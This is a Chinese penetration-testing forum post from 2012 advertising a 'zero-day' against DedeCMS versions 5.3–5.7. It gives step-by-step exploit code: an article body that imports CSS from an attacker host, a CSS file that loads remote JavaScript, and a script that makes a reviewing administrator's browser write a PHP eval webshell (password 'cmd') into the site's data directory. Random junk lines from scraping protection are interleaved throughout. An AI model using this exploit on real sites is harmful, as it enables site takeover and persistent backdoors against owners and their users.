中国网络渗透测试联盟
标题:
dedecms xss oday通杀所有版本 可getshell
[打印本页]
作者:
admin
时间:
2012-9-15 13:56
标题:
dedecms xss oday通杀所有版本 可getshell
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
7 f3 d$ c8 i+ {; E9 Z* g3 V' z
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
0 A; z- I- X) I% ^5 R( E
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
8 q: m7 J8 i& F, A$ R8 C: V0 O8 e( y
下面说说利用方法。
! @! L+ F* V$ b1 `0 V% F
条件有2个:
" P3 }3 }& b3 Y6 }
1.开启注册
0 o9 B& b2 R$ d6 s
2.开启投稿
' K1 J& C1 f4 N4 `
注册会员----发表文章
1 D7 A2 @$ q5 ]: {' @ j! u
内容填写:
( Q$ d9 K) [6 Q" d) J, d- @* _
复制代码
) b1 |; B& o8 |, Z! y x
<style>@im\port'\
http://xxx.com/xss.css';
</style>
" s6 S4 E0 n: y% m [
新建XSS.Css
* ~; V7 K" `7 R* A0 o) x( w$ G0 q
复制代码
6 _9 D) r8 j* j1 ?6 @- E
.body{
7 Y# u/ J* B- h9 k; o* l" u
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
7 M& ~4 Y+ n/ z
新建xss.js 内容为
- {/ q& a9 G6 @. S. J1 S
复制代码
: z' ^5 a, D2 k5 R! K
1.var request = false;
5 C; ?9 k% }# C4 y- L" ^! q0 U
2.if(window.XMLHttpRequest) {
/ ~2 }: X8 E0 D8 P3 _
3.request = new XMLHttpRequest();
: j8 E0 ^+ c" ? _* ], ]
4.if(request.overrideMimeType) {
! M; H3 B [% H4 N' ~8 d
5.request.overrideMimeType('text/xml');
/ i0 [' J5 x! c6 L+ D
6.}
- C# f) ?' d7 M; h* ]
7.} else if(window.ActiveXObject) {
4 t! Z) [5 S9 \3 f: `# o5 N: [7 N
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
8 d( A9 p! Z, U/ j; p
9.for(var i=0; i<versions.length; i++) {
7 M( F1 V+ v, g: k( d3 o. L1 m$ ~, L
10.try {
, E5 f- a7 ?+ j$ W7 e0 D [. v
11.request = new ActiveXObject(versions);
8 W7 a+ @2 t7 ]' P) y, {, o
12.} catch(e) {}
^$ R8 F( K; l8 G6 D7 n: g/ i
13.}
: W( |9 J2 Q5 H4 m; q
14.}
6 l: h/ ?: q* G( h: W# f$ `' n2 V
15.xmlhttp=request;
3 s" a* Y) P) K* a, D' g. B
16.function getFolder( url ){
$ Y* {3 i/ W6 i* x2 m
17. obj = url.split('/')
9 x5 G% o: T. u1 z; N6 z5 ?; T
18. return obj[obj.length-2]
) k; N4 {3 t( }3 b5 U4 u
19.}
" F0 p. G. B5 u$ K
20.oUrl = top.location.href;
' m. m! `5 k% w
21.u = getFolder(oUrl);
& N9 u0 i9 l3 @
22.add_admin();
) L* r& c% `; n: q7 N1 n% x5 S2 E, A
23.function add_admin(){
; e' c; ~$ t# X7 u \( o
24.var url= "/"+u+"/sys_sql_query.php";
$ W4 a0 b4 d7 S& h' g: d0 ?
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
8 I2 m: B" l$ [, H
26.xmlhttp.open("POST", url, true);
A5 V3 f/ T0 T+ c
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
' ]% |( h+ c6 u$ @) m- Y$ M
28.xmlhttp.setRequestHeader("Content-length", params.length);
0 O5 m( Z* S q: s8 F
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
, |$ U+ Y% V$ N) [+ w
30.xmlhttp.send(params);
# G1 e# q! N: Q5 e( X5 A
31.}
- g: D9 ]8 u% q. G% M# [
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2